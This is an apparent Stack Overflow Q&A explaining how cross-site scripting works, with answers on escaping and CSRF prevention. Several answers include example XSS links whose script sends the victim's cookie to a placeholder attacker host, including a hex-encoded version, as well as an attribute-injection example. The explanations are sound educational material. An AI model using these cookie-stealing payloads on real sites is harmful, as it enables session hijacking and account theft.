# How does XSS work?

Tags: xss

Can someone explain how XSS works in plain english? Maybe with an example. Googling didn't help much.

Comment: Do you mean Cross-site scripting?

Answer (score 35):

Cross Site Scripting basically is a security vulnerability of dynamic web pages where an attacker can create a malicious link to inject unwanted executable JavaScript into a Web site. The most usual case of this vulnerabilities occurs when GET variables are printed or echoed without filtering or checking their content.

When a victim clicks the link, the malicious code can then send the victim’s cookie away to another server, or it can modify the affected site, injecting forms, to steal usernames and passwords, and other phishing techniques.

Example of malicious link:

```
http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>
```

It's also common to encode the malicious code, for example in hex:

```
http://VulnerableHost/a.php?variable=%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%41%74%74%61%63%6B%65%72%73%48%6F%73%74%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E
```

Comment: Haha yes, this is a good example of proper escaping. Nice job Stack Overflow! :)

Comment: The part I'm not getting is the "victim" part.  If I visit examole.com and inject Java Script into tha page, that will render in MY browser.  How would this be used to attack a victim without somehoe getting example.com to serve that code or coupling it with some sort of SQL injection attack?

Comment: @CraigJacobs, the attacker will create the hyperlink, and send it to the "victim".  The victim clicks it, and the code executes on THEIR browser.  Now, the trick is what the javascript does.  It could scrap data from the page, or take the user's cookies, and send it somewhere else.  For example, it might take the user's cookies, and redirect the user to www.badguy.com?cookies=cookiesHere2343rwerw.  Now, badguy.com can get into the victim's session and do bad stuff.

Answer (score 20):

An XSS vulnerability exists whenever a string from outside your application can be interpreted as code.

For example, if you're generating HTML by doing this:

```html
<BODY>
  <?= $myQueryParameter ?>
</BODY>
```

then if the `$myQueryParameter` variable contains a `<SCRIPT>` tag then it will end up executing code.

To prevent an input from being executed as code, you need to **escape** content properly.

The above problem can be solved by realizing that the `$myQueryParameter` variable contains plain text, but you can't just go and put plain text into HTML and expect it to work.

So you need to convert plain text to HTML so you can put it into your HTML page.  That process of converting a string in one language to another so that it can be embedded is escaping.

You can escape plain text to HTML with a function like:

```js
function escapePlainTextToHTML(plainText) {
  return plainText.replace(/\0/g, '')
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&#34;')
      .replace(/'/g, '&#39;');
}
```

Answer (score 2):

**In Simple English**

XSS is when you insert scripts (meaning JavaScript code) into webpages, so that the browser executes the code. This is malicious, because it can be used to steal cookies, and any other data on the page. For example:

The HTML of a search box: `<input value="*search value here*">`

Now if you insert `" onmouseover="alert(1)`, the final HTML would be `<input value="" onmouseover="alert(1)">` 
When the mouse is passed over the search box, the "alert" will be executed.

**In "WikiText"**

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

Answer (score 2):

In simple english **XSS** is a security vulnerabilty in which attacker can frame a malicious script to compromise the website. Now **How it works?**

As we know that **XSS** needs an input field or we can say that the GET variable through which the input is echo back to the user without filteration and sometimes filteration. After request, it is acceptable ("source code") by the browser as a response to show the contents to the user. **Remember what ever you had written in the input field it will be on the source code response**.So you should check it because sometimes web developer make restriction on the alert box .

If you are an attacker first you need to know the xss vulnerability by using the script tag.

For example:- alert("test")

**Here alert() is used to make the popup box with the ok button and what ever you have written in the bracket it will be popup on the screen**. And script tags are invisible.

Now attacker can make a malicious script to steal the cookie, steal the credentials etc.

> For example:- hxxp://www.VulnerableSite.com/index.php?search=location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;

Here your site is the attacker site at which the attacker can redirect the victim's cookie on his own's site with the help of document.cookie.

Thats it.

Here script tag invisible

Answer (score 1):

I've written up an article on what XSS is and how to address it somewhat as a PHP developer. There are also examples of what both types of XSS attacks look like (persistent vs. non-persistent).

There are two types of XSS attacks:

1. Non-persistent: This would be a specially crafted URL that embeds a
   script as one of the parameters to the target page. The nasty URL
   can be sent out in an email with the intent of tricking the
   recipient into clicking it. The target page mishandles the parameter
   and unintentionally sends code to the client's machine that was
   passed in originally through the URL string.
2. Persistent: This attack
   uses a page on a site that saves form data to the database without
   handling the input data properly. A malicious user can embed a nasty
   script as part of a typical data field (like Last Name) that is run
   on the client's web browser unknowingly. Normally the nasty script
   would be stored to the database and re-run on every client's visit
   to the infected page.

See more here:
http://www.thedablog.com/what-is-xss/

Answer (score -2):

XSS -

Vulnerability caused when the web-site places the trust on the user and does not filter the user-input. 
The user-input causes unwanted script to be executed on the site.

1. Prevention:

   - Filter user input using HTML input sanitizers

     (e.g strip_tags, htmlspecialchars, htmlentities, mysql_real_string_escape in php)

CSRF:

Vulnerability caused when the user places the trust on the site but the site may work to get user-information and misuse it.

1. Prevention:

   - Uniquely auto-generate a csrf_token every-time a form is rendered. The csrf_token is sent to the server on form submission for verification. e.g. https://docs.djangoproject.com/en/dev/ref/contrib/csrf/